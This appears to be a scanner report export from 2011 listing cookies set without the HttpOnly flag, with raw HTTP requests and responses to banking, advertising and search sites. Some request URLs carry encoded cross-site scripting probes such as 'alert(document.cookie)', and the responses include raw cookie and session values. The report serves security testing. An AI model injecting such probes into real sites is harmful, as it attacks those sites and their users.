HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 21:59:53 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV Set-Cookie: C2=ZPdSNJpwHg02FezBdbdh3cwUwX4NH8Y4FezBYTeh3cQ3gZ4NHQTnGezBF2ph3cAohX4NHYZ4FezBKGeh3cwohX4NHca4FezBiGeh3cQshX4NwOIAM/oROI7YBwAoGXzr1NQcKa8GGKmAI9YRVN53DkL3FyxgPTw6TVIQsuWB/0mBOca7FIaWGserMWw41ZE+kqlB6bjB4p6bCwWZGX5r4fQsMawEwa3BW8oBT0I9HsfzFSxsNeQQoa4Ns2zB1xmRK6KzIUyhGAH; domain=advertising.com; expires=Fri, 01-Feb-2013 21:59:53 GMT; path=/ Set-Cookie: GUID=MTI5NjY4Mzk5MzsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ; domain=advertising.com; expires=Fri, 01-Feb-2013 21:59:53 GMT; path=/ Set-Cookie: DBC=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/ Cache-Control: private, max-age=3600 Expires: Wed, 02 Feb 2011 22:59:53 GMT Content-Type: image/gif Content-Length: 49
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /maps HTTP/1.1 Host: maps.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /maps/place HTTP/1.1 Host: maps.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /set_beta HTTP/1.1 Host: maps.yahoo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 01:03:15 GMT Set-Cookie: B=3eaqqlp6kjvmj&b=3&s=bk; expires=Tue, 02-Jun-2037 20:00:00 GMT; path=/; domain=.yahoo.com P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=iso-8859-1 Content-Length: 3344
<!doctype html public "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html><head><title>Yahoo! - 404 Not Found</title><style> /* nn4 hide */ /*/*/ body {font:small/1.2em arial,h ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cgi-bin/ifsewwwc?Logon HTTP/1.1 Host: myaccounts.navyfcu.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /signon HTTP/1.1 Host: online.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:02:13 GMT Cache-Control: no-cache="set-cookie" X-Cnection: close Location: https://online.wellsfargo.com/login?LOB=BIZ&ERROR_CODE=ZXJyb3IuY29va2llc05vdEVuYWJsZWQ%3D X-Powered-By: Servlet/2.4 JSP/2.0 Set-Cookie: OB_SO_ORIGIN=source=alternate;path=/;domain=.wellsfargo.com; Set-Cookie: ISD_DAS_COOKIE=Zwt2abN8dLgwD7E5lQAAAAAAA5lwAI7oMlzo4nNgjH5Nn3E7KNFroc2SxeqP8qV8CZgGCvTIC19wEM8=;path=/;domain=.wellsfargo.com; Connection: close
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="https://online.wellsfargo.com/logi ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /auth/AuthService HTTP/1.1 Host: onlineservices.wachovia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:02:13 GMT Server: IBM_HTTP_Server Set-Cookie: TLTSID=16FB92962F18102F5856F16EF5F79C09; Path=/; Domain=.wachovia.com Cache-Control: no-store Pragma: no-store Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: AuthSvsSessionID=IzW+wP+VVHuq0l/F/NqxgmwCKP0=55 4N.LEInmgXLF30lFrJTXIXXWgrr.1012025; HttpOnly; Path=/; Domain=.wachovia.com; Secure x-frames-option: deny Connection: close Content-Type: text/html Content-Language: en Content-Length: 13099
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!--
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /pixel;r=321886802;fpan=1;fpa=P0-629275191-1296696399668;ns=0;url=http%3A%2F%2Fthehill.com%2Fblogs%2Fe2-wire%2F677-e2-wire650aa'%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E2295b33377e%2F137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more;ref=http%3A%2F%2Fburp%2Fshow%2F31;ce=1;je=1;sr=1920x1200x16;enc=n;ogl=;dst=1;et=1296696399666;tzo=360;a=p-51dZx4IkAE4Zk HTTP/1.1 Host: pixel.quantserve.com Proxy-Connection: keep-alive Referer: http://thehill.com/blogs/e2-wire/677-e2-wire650aa'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E2295b33377e/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: mc=4d21fad0-365c5-43e3d-97d7a; d=EBEAG6ANq0itiBDbz6HJXbIAAb8BAfoFgfUAmtGkrxPyD5HhvB0s5SBu0fLChB0bohjR4QCEgaMMF9oYHPbyDhAA0Q4QKNGT_jg5INQohIFADybhCxjCsdeDCxpRseEAKhHyAiABcoSCVegsEDsjg7EeGaIQ
Response
HTTP/1.1 204 No Content Connection: close Set-Cookie: d=EHUAG6ANq0itiBDbz6HJXbIAAbsBAfsFgZYAmtGkrxPyD5HhvB0s5SBu0fLChB0bohjR4QCEgaMKwQz28g4QANEOECjRk_44OSDUKISBQA8m4QsYwrHXgwsaUbHhACoR8gIgAXKEglXoLBA7I4OxHhmiEA; expires=Wed, 04-May-2011 01:26:00 GMT; path=/; domain=.quantserve.com P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV" Cache-Control: private, no-cache, no-store, proxy-revalidate Pragma: no-cache Expires: Fri, 04 Aug 1978 12:00:00 GMT Date: Thu, 03 Feb 2011 01:26:00 GMT Server: QS
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /paynow/ HTTP/1.1 Host: promo.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /r/beacon?b2=gX2iQOUxtnHmRU47KaHireBgXSml7iqTWpMq6sC-bkfBLD_8Bpm0tGlg0hKb4nkI99t0_v7dGOPLnScMot5haQ&cid= HTTP/1.1 Host: r.turn.com Proxy-Connection: keep-alive Referer: http://fls.doubleclick.net/activityi;src=1791096;type=citi08ft;cat=homechar;ord=1;num=7738084758166.224? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: uid=3011330574290390485; adImpCount= ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
v1st=2D72E3495D74083; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.cardmemberservices.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /MyAccounts.aspx HTTP/1.1 Host: resources.cardmemberservices.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Cache-Control: no-cache Pragma: no-cache Content-Length: 170 Content-Type: text/html; charset=utf-8 Expires: -1 Location: https://online.cardmemberservices.com/MyAccounts.aspx Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: no-cache=Set-Cookie Expires: Thu, 01 Dec 1994 16:00:00 GMT Set-Cookie: v1st=2D72E3495D74083; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.cardmemberservices.com Date: Wed, 02 Feb 2011 22:02:19 GMT Connection: close
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="https://online.cardmemberservices.com/MyAccounts.aspx">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the HttpOnly flag set:
v1st=D5E5B6A166EC8299; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chase.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /MyAccounts.aspx HTTP/1.1 Host: resources.chase.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Cache-Control: no-cache Pragma: no-cache Content-Length: 162 Content-Type: text/html; charset=utf-8 Expires: -1 Location: https://chaseonline.chase.com/MyAccounts.aspx Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: no-cache=Set-Cookie Expires: Thu, 01 Dec 1994 16:00:00 GMT Set-Cookie: v1st=D5E5B6A166EC8299; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chase.com Date: Wed, 02 Feb 2011 22:02:19 GMT Connection: close
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="https://chaseonline.chase.com/MyAccounts.aspx">here</a>.</h2> </body></html>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /meta HTTP/1.1 Host: s.xp1.ru4.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /%20%20%20%20%20%20%20%20%20%20%20%20%201','','0C HTTP/1.1 Host: search.aol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The following cookie was issued by the application and does not have the HttpOnly flag set:
AAFES=R1966950070; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /shop/ECC/Account/OlApp.aspx HTTP/1.1 Host: shop.aafes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Set-Cookie: AAFES=R1966950070; path=/ Connection: close Date: Thu, 03 Feb 2011 01:04:53 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Powered-By: UrlRewriter.NET 2.0.0 Location: https://shop.aafes.com/shop/Login.aspx?ReturnURL=https://shop.aafes.com/shop/ECC/Account/OlApp.aspx Set-Cookie: ASP.NET_SessionId=2n4tod55edqnia45xomyrlzq; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 216
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="https://shop.aafes.com/shop/Login.aspx?ReturnURL=https://shop.aafes.com/shop/ECC/Account/OlApp.aspx">here</a>.</h2>
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /dcssdhxcq00000008yjgz9rbs_9d3h/dcs.gif?&dcsdat=1296684059906&dcssip=www.citizensbank.com&dcsuri=/&WT.tz=-6&WT.bh=16&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=Citizens%20Bank:%20Secure%20Online%20Banking%20%26%20Personal%20Finance%20Solutions%20|%20Citizens%20Bank&WT.js=Yes&WT.jv=1.5&WT.bs=1036x1012&WT.fi=Yes&WT.fv=10.1&WT.tv=8.0.0&WT.sp=EN&WT.cg_n=None&WT.cg_s=None&WT.ckexist=0&WT.ckimpressions=0&WT.vt_f_tlv=0&WT.vt_f_tlh=0&WT.vt_f_d=1&WT.vt_f_s=1&WT.vt_f_a=1&WT.vt_f=1&WT.vt_sid=2f09a5fcfe32cca7b8b1296687659993.1296684059993&WT.co_f=2f09a5fcfe32cca7b8b1296687659993&WT.ad=standardoverdraftpractices;mobilebanking;goaltracksavings;trufitstudentloan;circlegoldmoneymarket;greensense;collegesaver;refinance;homebuyersavings;moneyhelp HTTP/1.1 Host: statse.webtrendslive.com Proxy-Connection: keep-alive Referer: http://www.citizensbank.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0yNjA1MzY0MzY4LjMwMTI2NDkyAAAAAAAFAAAAtXsAAGwfLU1MHy1N4LYAANfxQk3H8UJNZuAAALAkRE2vJERNoPEAAIycRU2MnEVND6gAANjTSU3Y00lNBQAAAF4zAABsHy1NTB8tTQtFAADX8UJNx/FCTUtLAACwJERNryRETWpLAACMnEVNjJxFTcJBAADY00lN2NNJTQAAAAA-
Response
HTTP/1.1 303 Object Moved Connection: close Date: Wed, 02 Feb 2011 22:00:03 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Location: /dcssdhxcq00000008yjgz9rbs_9d3h/dcs.gif?dcsredirect=112&dcstlh=0&dcstlv=0&dcsdat=1296684059906&dcssip=www.citizensbank.com&dcsuri=/&WT.tz=-6&WT.bh=16&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=Citizens%20Bank:%20Secure%20Online%20Banking%20%26%20Personal%20Finance%20Solutions%20|%20Citizens%20Bank&WT.js=Yes&WT.jv=1.5&WT.bs=1036x1012&WT.fi=Yes&WT.fv=10.1&WT.tv=8.0.0&WT.sp=EN&WT.cg_n=None&WT.cg_s=None&WT.ckexist=0&WT.ckimpressions=0&WT.vt_f_tlv=0&WT.vt_f_tlh=0&WT.vt_f_d=1&WT.vt_f_s=1&WT.vt_f_a=1&WT.vt_f=1&WT.vt_sid=2f09a5fcfe32cca7b8b1296687659993.1296684059993&WT.co_f=2f09a5fcfe32cca7b8b1296687659993&WT.ad=standardoverdraftpractices;mobilebanking;goaltracksavings;trufitstudentloan;circlegoldmoneymarket;greensense;collegesaver;refinance;homebuyersavings;moneyhelp Content-Length: 0 Set-Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0yNjA1MzY0MzY4LjMwMTI2NDkyAAAAAAAGAAAAtXsAAGwfLU1MHy1N4LYAANfxQk3H8UJNZuAAALAkRE2vJERNoPEAAIycRU2MnEVND6gAANjTSU3Y00lNDqgAAOPTSU3j00lNBQAAAF4zAABsHy1NTB8tTQtFAADX8UJNx/FCTUtLAACwJERNryRETWpLAACMnEVNjJxFTcJBAADj00lN2NNJTQAAAAA-; path=/; expires=Thu, 10-Dec-2015 10:27:34 GMT P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /dcst1s1qz00000s5jw3dagrbs_7i7l/dcs.gif?&dcsdat=1296684049096&dcssip=www.charterone.com&dcsuri=/&WT.tz=-6&WT.bh=16&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=Charter%20One:%20Secure%20Online%20Banking%20%26%20Personal%20Finance%20Solutions%20|%20Charter%20One&WT.js=Yes&WT.jv=1.5&WT.bs=1036x1012&WT.fi=Yes&WT.fv=10.1&WT.tv=8.0.0&WT.sp=EN&WT.cg_n=None&WT.cg_s=None&WT.ckexist=0&WT.ckimpressions=0&WT.vt_f_tlv=0&WT.vt_f_tlh=0&WT.vt_f_d=1&WT.vt_f_s=1&WT.vt_f_a=1&WT.vt_f=1&WT.vt_sid=23b1ef31bcf943a33a31296687649101.1296684049101&WT.co_f=23b1ef31bcf943a33a31296687649101&WT.ad=standardoverdraftpractices;mobilebanking;goaltracksavings;trufitstudentloan;circlegoldmoneymarket;greensense;collegesaver;refinance;homebuyersavings;moneyhelp HTTP/1.1 Host: statse.webtrendslive.com Proxy-Connection: keep-alive Referer: http://www.charterone.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0yNjA1MzY0MzY4LjMwMTI2NDkyAAAAAAAEAAAAtXsAAGwfLU1MHy1N4LYAANfxQk3H8UJNZuAAALAkRE2vJERNoPEAAIycRU2MnEVNBAAAAF4zAABsHy1NTB8tTQtFAADX8UJNx/FCTUtLAACwJERNryRETWpLAACMnEVNjJxFTQAAAAA-
Response
HTTP/1.1 303 Object Moved Connection: close Date: Wed, 02 Feb 2011 21:59:52 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Location: /dcst1s1qz00000s5jw3dagrbs_7i7l/dcs.gif?dcsredirect=126&dcstlh=0&dcstlv=0&dcsdat=1296684049096&dcssip=www.charterone.com&dcsuri=/&WT.tz=-6&WT.bh=16&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=Charter%20One:%20Secure%20Online%20Banking%20%26%20Personal%20Finance%20Solutions%20|%20Charter%20One&WT.js=Yes&WT.jv=1.5&WT.bs=1036x1012&WT.fi=Yes&WT.fv=10.1&WT.tv=8.0.0&WT.sp=EN&WT.cg_n=None&WT.cg_s=None&WT.ckexist=0&WT.ckimpressions=0&WT.vt_f_tlv=0&WT.vt_f_tlh=0&WT.vt_f_d=1&WT.vt_f_s=1&WT.vt_f_a=1&WT.vt_f=1&WT.vt_sid=23b1ef31bcf943a33a31296687649101.1296684049101&WT.co_f=23b1ef31bcf943a33a31296687649101&WT.ad=standardoverdraftpractices;mobilebanking;goaltracksavings;trufitstudentloan;circlegoldmoneymarket;greensense;collegesaver;refinance;homebuyersavings;moneyhelp Content-Length: 0 Set-Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0yNjA1MzY0MzY4LjMwMTI2NDkyAAAAAAAFAAAAtXsAAGwfLU1MHy1N4LYAANfxQk3H8UJNZuAAALAkRE2vJERNoPEAAIycRU2MnEVND6gAANjTSU3Y00lNBQAAAF4zAABsHy1NTB8tTQtFAADX8UJNx/FCTUtLAACwJERNryRETWpLAACMnEVNjJxFTcJBAADY00lN2NNJTQAAAAA-; path=/; expires=Thu, 10-Dec-2015 10:27:34 GMT P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /meta HTTP/1.1 Host: stg.xp1.ru4.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /i?siteID=429&ts=1296684340039&location=http%3A%2F%2Fwww.bankofamerica.com%2Ffindit%2Ferror.cgi%3FBOA_0020%3D20110202%3A0%3AO%3A5067fc0c-5451-405a-bffc3c21dd627de9%26state%3Dfalse%26BA_0021%3Dfalse&tagv=4.3&tz=-360&r=http%3A%2F%2Fwww.bankofamerica.com%2Fvehicle_and_personal_loans544ce%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E45ae18a6011%2Findex.cfm&title=Bank%20of%20America%20%7C%20Please%20Try%20Again&cd=16&ah=1156&aw=1920&sh=1200&sw=1920&pd=16 HTTP/1.1 Host: tc.bankofamerica.com Proxy-Connection: keep-alive Referer: http://www.bankofamerica.com/findit/error.cgi Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TLTSID=D98FA69C2F17102F856AA91CC30F81BB; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; cmTPSet=Y; throttle_value=21
Response
HTTP/1.1 200 OK Cache-control: no-cache, private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Date: Wed, 02 Feb 2011 22:04:41 GMT Last-Modified: Wed, 02 Feb 2011 22:04:41 GMT P3P: policyref="http://www.touchclarity.com/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa TAIa PSAa PSDa OUR STP UNI PUR COM NAV INT STA PRE" Set-Cookie: TCID=0007ae71-9ad3-3b5c-9719-884700000028;path=/;domain=bankofamerica.com;expires=Sat, 02-Feb-2013 22:04:41 GMT; Connection: Keep-Alive Content-Length: 43 Content-Type: image/gif Set-Cookie: NSC_CbolPgBnfsjdb=445b32097852;expires=Thu, 03-Feb-11 02:04:42 GMT;path=/;domain=bankofamerica.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /c?siteid=429&ccID=BOA_HOME_SIGNON_SERVICE_01&ccID=BOA_HOME_SIGNON_SERVICE_02&ccID=BOA_HOME_SIGNON_SERVICE_03&ccID=BOA_HOME_SIGNON_HERO&location=https%3A%2F%2Fwww.bankofamerica.com%2Fhomepage%2Foverview.go%3FBOA_0020%3D999%26tc_lang%3Den_US%26state%3Dnull%26BA_0021%3Dnull%26BOA_HPR%3Dnull HTTP/1.1 Host: tc.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-control: no-cache, private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Date: Wed, 02 Feb 2011 22:02:37 GMT Last-Modified: Wed, 02 Feb 2011 22:02:37 GMT P3P: policyref="http://www.touchclarity.com/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa TAIa PSAa PSDa OUR STP UNI PUR COM NAV INT STA PRE" Set-Cookie: TCID=0007ae71-99a3-d958-8d17-88470000005a;path=/;domain=bankofamerica.com;expires=Sat, 02-Feb-2013 22:02:37 GMT; Connection: Keep-Alive Content-Length: 563 Content-Type: text/javascript; charset=ISO-8859-1 Set-Cookie: NSC_CbolPgBnfsjdb=445b32097852;expires=Thu, 03-Feb-11 02:02:38 GMT;path=/;domain=bankofamerica.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: translate.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 01:05:04 GMT Expires: Thu, 03 Feb 2011 01:05:04 GMT Cache-Control: private, max-age=86400 Content-Type: text/html; charset=UTF-8 Content-Language: en Set-Cookie: PREF=ID=1bec15895da74ab0:TM=1296695104:LM=1296695104:S=GaVtpWsLtBVoNxSV; expires=Sat, 02-Feb-2013 01:05:04 GMT; path=/; domain=.google.com X-Content-Type-Options: nosniff Server: translation X-XSS-Protection: 1; mode=block Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /translate_t?q=ipboard+software&um=1&ie=UTF-8&sa=N&hl=en&tab=wT HTTP/1.1 Host: translate.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 01:05:02 GMT Expires: Thu, 03 Feb 2011 01:05:02 GMT Cache-Control: private, max-age=86400 Content-Type: text/html; charset=UTF-8 Content-Language: en Set-Cookie: PREF=ID=25ad30bb14812802:TM=1296695102:LM=1296695102:S=SmhVQvsJtj0-g9k_; expires=Sat, 02-Feb-2013 01:05:02 GMT; path=/; domain=.google.com X-Content-Type-Options: nosniff Server: translation X-XSS-Protection: 1; mode=block Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /?country=us&ep=v_gg_new&akamai=true HTTP/1.1 Host: usa.visa.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /HG?hc=&hb=DM550608DPBR&cd=1&hv=6&n=/Citi+Home&con=&vcon=/CBOL/Home&tt=auto&ja=y&dt=16&zo=360&lm=1296102623000&bn=Netscape&ce=y&ss=1920*1200&sc=16&sv=16&cy=u&hp=u&ln=en-US&vpc=HBX0200u&vjs=HBX0201.03u&hec=0&pec=&cmp=&gp=&dcmp=&dcmpe=&dcmpre=&cp=null&fnl=&seg=1,-2&epg=&cv=&gn=&ld=&la=&c1=&c2=&c3=&c4=&customerid=&ttt=lid,lpos&ra=&pu=&rf=bookmark&pl=Chrome%20PDF%20Viewer%3AGoogle%20Gears%200.5.33.0%3AShockwave%20Flash%3AJava%20Deployment%20Toolkit%206.0.230.5%3AJava%28TM%29%20Platform%20SE%206%20U23%3AWPI%20Detector%201.1%3AGoogle%20Update%3ASilverlight%20Plug-In%3ADefault%20Plug-in%3A&lv.id=Header_Open%20an%20Account,Header_Find%20Citi%20Locations,Header_Search,Header_Help,Header_Contact%20Us,Header_Security,Header_Privacy,Header_Citi.com,PublicMenu_Banking%20Overview,PublicMenu_Checking,PublicMenu_Savings,PublicMenu_Certificates%20of%20Deposit%28CDs%29,PublicMenu_IRAs%20And%20IRA%20Rollovers,&lv.pos=,,,,,,,,,,,,,&hid=0.46637816983275115 HTTP/1.1 Host: vendorweb.citibank.com Proxy-Connection: keep-alive Referer: http://www.citi.com/domain/home.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
